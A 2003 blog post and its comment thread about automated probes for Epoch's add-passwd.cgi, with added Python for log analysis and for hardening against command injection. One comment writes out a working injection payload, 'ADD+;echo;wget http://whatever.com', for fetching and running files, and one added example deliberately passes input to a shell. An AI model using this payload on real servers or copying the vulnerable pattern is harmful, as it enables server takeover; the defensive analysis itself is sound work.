December 27, 2003
What's Going On?

Yesterday's referral logs list nine different referrals coming (supposedly) from various permutations of this address:

drweevil.org//pages/add-passwd.cgi

Most of the permutations just changed the directory name, from /pages to (e.g.) /cgibin or /cgi-bin or /cgi-bin/epoch, but one changed the file name to es-passwd.cgi. Four of the referrals were repeated, for a total of 13. Fortunately, there doesn't seem to be any such file as add-passwd.cgi or es-passwd.cgi in my version of Movable Type, and most of the directories tried do not exist on my site, either.

Checking my logs, I find that the 13 referrals came from 11 different IP addresses, most of them apparently in Portugal or Queensland, though my WhoIs skills are rudimentary. If anyone is wondering, here are the IP numbers, which I have of course banned:

164.100.190.246 (twice)
213.141.31.146
211.75.231.21 (twice)
203.115.204.133
203.200.28.158
202.188.63.130
217.33.69.131
200.223.149.170
148.223.251.99
203.113.34.239
194.126.30.138

So what exactly is going on? Given the name add-passwd.cgi, it looks as if someone is trying to gain posting privileges on my site. There is certainly no legitimate reason why any stranger -- or any friend or relative, for that matter -- should even think of trying to add a password to my site without my permission. I'm left with a number of questions:

  1. What exactly are these evil persons trying to do? Shut my website down entirely? Take it over completely and post things I would not wish to post? (Something like that seems to have happened to the egregious 'Barney Gumble', though I gather that was because he gave up his BlogSpot site, which allowed someone else to claim it.) Or is there some sort of partial takeover that would be useful to someone in some way, and worth going to a lot of trouble to achieve? (Trolls can already put crap in my comments, though it doesn't last long.)
  2. Why would anyone want to do this? If they're trying to shut me down, it's presumably because they disapprove of what I post, most likely for political reasons. If they're trying to take over my site, it may not be personal: they may just be looking for any site that could be hijacked to sell groinopaphic pictures or Viagra or Jihad or whatever, or just to display some pathetic geek's web-graffiti.
  3. How vulnerable am I? Could this have worked if they had been a little luckier? Could it work in the future? Has it already worked, and I don't know it yet? (It occurs to me that they may be somehow attempting to insert an add-passwd.cgi file in my directories rather than find one that's already there. If so, they have not yet succeeded: I checked all my directories.)
  4. What can I do to prevent this kind of attack (or reconnaissance mission, if that's what it is) in the future?

Please place your suggestions in the comments.

Posted by Dr. Weevil at December 27, 2003 01:43 PM
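
The post's method, checking the referral and access logs for every permutation of the probed path and tallying the source addresses, can be done mechanically. The following is an added example, not code from the original post or from Movable Type: it parses Apache "combined" log lines, normalizes the doubled slashes and varying directory names seen above so that `drweevil.org//pages/add-passwd.cgi` and `/cgi-bin/epoch/add-passwd.cgi` both reduce to a probe for the same script, and reports hits whether the name appears in the request line or in the Referer field (the scanner here put the target URL in the Referer, which is why it showed up in the referral logs). The script names come from this page (add-passwd.cgi, es-passwd.cgi, and CCBill's whereami.cgi from the comments); the log lines are constructed for the example, reusing a few of the IP addresses listed in the post.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Script names reported as probed on this page (Epoch add-passwd.cgi, the
# es-passwd.cgi variant, and CCBill's whereami.cgi from the comment thread).
PROBED_SCRIPTS = {"add-passwd.cgi", "es-passwd.cgi", "whereami.cgi"}

# Constructed sample log lines (not real log data); IPs reused from the post.
SAMPLE_LOG = [
    '164.100.190.246 - - [26/Dec/2003:09:12:44 -0500] "GET / HTTP/1.0" 200 5123 "drweevil.org//pages/add-passwd.cgi" "Mozilla/4.0"',
    '164.100.190.246 - - [26/Dec/2003:09:12:45 -0500] "GET / HTTP/1.0" 200 5123 "drweevil.org//cgi-bin/add-passwd.cgi" "Mozilla/4.0"',
    '213.141.31.146 - - [26/Dec/2003:10:02:01 -0500] "GET / HTTP/1.0" 200 5123 "http://drweevil.org/cgi-bin/epoch/add-passwd.cgi" "Mozilla/4.0"',
    '211.75.231.21 - - [26/Dec/2003:11:40:19 -0500] "GET / HTTP/1.0" 200 5123 "drweevil.org//cgibin/es-passwd.cgi" "Mozilla/4.0"',
    '211.75.231.21 - - [26/Dec/2003:11:40:20 -0500] "POST /cgi-bin/add-passwd.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [26/Dec/2003:12:00:00 -0500] "GET /archives/2003_12.html HTTP/1.1" 200 22044 "http://www.example.com/links.html" "Mozilla/5.0"',
]


def normalize_path(value):
    """Reduce a request path, a full URL, or a bare 'host//dir/file' referer to a
    lower-cased path with runs of slashes collapsed and any query string dropped,
    so the permutations described in the post compare equal."""
    if "://" not in value and not value.startswith("/"):
        value = "//" + value  # bare host form, e.g. drweevil.org//pages/add-passwd.cgi
    path = urlsplit(value).path
    return re.sub(r"/+", "/", path).lower() or "/"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split()
    rec["method"], rec["path"] = (parts[0], parts[1]) if len(parts) >= 2 else ("", "")
    return rec


def probe_hits(lines):
    """Yield (ip, where, normalized_path) for every line whose request path or
    Referer ends in one of the probed script names."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for where, value in (("request", rec["path"]), ("referer", rec["referer"])):
            if not value or value == "-":
                continue
            path = normalize_path(value)
            if path.rsplit("/", 1)[-1] in PROBED_SCRIPTS:
                yield rec["ip"], where, path


def tally_by_ip(lines):
    """Count probe hits per client address; this is the list the post hand-compiled."""
    return Counter(ip for ip, _, _ in probe_hits(lines))


if __name__ == "__main__":
    for ip, where, path in probe_hits(SAMPLE_LOG):
        print(f"{ip:16} {where:8} {path}")
    print(tally_by_ip(SAMPLE_LOG))
```

Run it over the real access log with `tally_by_ip(open("access_log"))`; the tally, not the per-line hits, is what tells you whether you are looking at one scanner cycling through a proxy list or many independent sources, and a 404 on every hit (as in the constructed POST line) means the probed script is not present.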
Comments

Found this mention on a chat board at amateurmasters.com:

Did anyone get this about the Epoch script and the possible CCbill script being vulnerable?

We have found a particular problem with the add-passwd.cgi script from Epoch, which appears to have a pretty severe security problem. The locations of this script are below.

/cgi-bin/add-passwd.cgi

It is through this script, located at /cgi-bin/add-passwd.cgi, that someone was able to issue commands on the server just as if they were user "cfox" logged in at a telnet prompt. They used this access to compile a tool used for committing denial of service attacks and, when the mood struck them to do so, activated one.

The prime targets for the attackers appear to be Epoch's add-passwd.cgi and CCBill's whereami.cgi scripts. New versions of the paysite password administration code need to be installed ASAP or sooner; we will need to disable the old scripts pretty soon because they are actively being used to attack others and are having an impact on our network.

Please contact Epoch ASAP and get the most current version of the add-passwd.cgi script, and anything else Epoch provides that may need updating to end the security issue.

****Anyone have any problems with this?

Hmmm
Hugs
Mina

Me again. Epoch runs a business that appears to deal with handling business transactions through Web sites. I can't find any information at their Web site (www.epochsystems.com), but their site map shows they offer billing support to several European countries, including Portugal.

Posted by: Bill Peschel on December 28, 2003 11:53 PM

Thanks! It looks like I'm safe, since I don't have any Epoch software, or any software to collect money over the web except my PayPal button, which I gather is not affected.

Posted by: Dr. Weevil on December 29, 2003 12:01 AM

You say "a pretty severe security problem"
mmmmm :)
Just for your info, this script is a very severe security problem!!!!!!!!!!!
Now I'll tell you why:
with a simple HTTP debugger you can use POST data and download to the server any file you want.
Imagine that!
Viruses, backdoors or whatever you want, and it's so simple: you just have to type in the POST data
ADD+;echo;(cmd here)
It can be
ADD+;echo;wget http://whatever.com
and then he can use any command he wants to open the file he downloaded and exec it as well.
:\ Many sites use this script :\
Bo0oM^

Posted by: oren on January 6, 2004 01:41 PM
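
The payload shape in the comment above, `ADD+;echo;(cmd here)`, is the classic signature of a CGI that pastes a decoded form field into a shell command line: `+` decodes to a space, and `;` then ends the intended command and starts the attacker's. The following is an added example, not the Epoch script (whose source is not on this page) and not code from any commenter: a hypothetical CGI handler written in the vulnerable style beside a hardened one, with `echo` standing in for whatever password tool the real script would call. The request bodies and field names (`action`, `user`) are constructed for the example; the injected body uses `echo INJECTED` in place of the `wget` step quoted above. It runs on any POSIX system with `/bin/sh`.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed request bodies (not from the page). The second has the shape quoted in
# the comment: "ADD+;echo+..." -- form-decoding turns '+' into a space.
BENIGN_BODY = "action=ADD&user=alice"
INJECTED_BODY = "action=ADD+;echo+INJECTED;&user=alice"


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into a dict.
    Split explicitly on '&' so that ';' inside a value survives as data
    (older parse_qs versions treated ';' as a separator)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields.get("action", ""), fields.get("user", "")


def run_vulnerable(body):
    """Hypothetical vulnerable pattern: the decoded field is interpolated into a
    single command string and handed to /bin/sh, which interprets the ';'.
    Returns the shell's stdout so the effect can be checked."""
    action, user = parse_body(body)
    cmd = f"echo {action} {user}"  # with the injected body: echo ADD ;echo INJECTED; alice
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def run_argv_only(body):
    """Same handler with the shell removed: the field is one argv element and the
    ';' is passed to the program as literal data, not executed."""
    action, user = parse_body(body)
    out = subprocess.run(["echo", action, user], capture_output=True, text=True)
    return out.stdout


# Allow-lists for the hardened version: a fixed action vocabulary and a conservative
# account-name pattern (the pattern is an assumption for the example).
ACTION_RE = re.compile(r"^(ADD|DEL)$")
USER_RE = re.compile(r"^[a-z][a-z0-9_-]{0,31}$")


def validate_fields(action, user):
    """True only if both fields match their allow-list."""
    return bool(ACTION_RE.match(action)) and bool(USER_RE.match(user))


def run_hardened(body):
    """Hardened handler: reject anything outside the allow-list, then call the
    tool with an argv list so no shell ever sees the input."""
    action, user = parse_body(body)
    if not validate_fields(action, user):
        raise ValueError("rejected: field contains characters outside the allowed set")
    out = subprocess.run(["echo", action, user], capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(INJECTED_BODY)))   # INJECTED appears on its own line
    print("argv only: ", repr(run_argv_only(INJECTED_BODY)))    # ';echo INJECTED;' is just text
    try:
        run_hardened(INJECTED_BODY)
    except ValueError as e:
        print("hardened:  ", e)
```

Both layers matter: the argv form is what actually stops the shell from interpreting metacharacters, and the allow-list is what stops the field from reaching the tool with something it would misinterpret on its own (an argument beginning with `-`, for instance). Validating alone while keeping `shell=True` is fragile; dropping the shell alone still forwards garbage to the underlying program.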

I'm not sure if you care or not, but here:

1) Those IP addresses mean nothing. People aren't idiots; they use hundreds and hundreds of anonymous proxies. These proxies are rated on a 1-5 scale in terms of anonymity. You will never get any information on who actually used the proxy, even if you contact the proxy owner, because no logs are kept.

2) This is being done by an automated scanner someone uses. It's basically blindly searching for an exploit for whatever reason to gain access to certain things on your site. In general these attacks are only launched against porn sites.

Posted by: random person on July 18, 2004 10:44 PM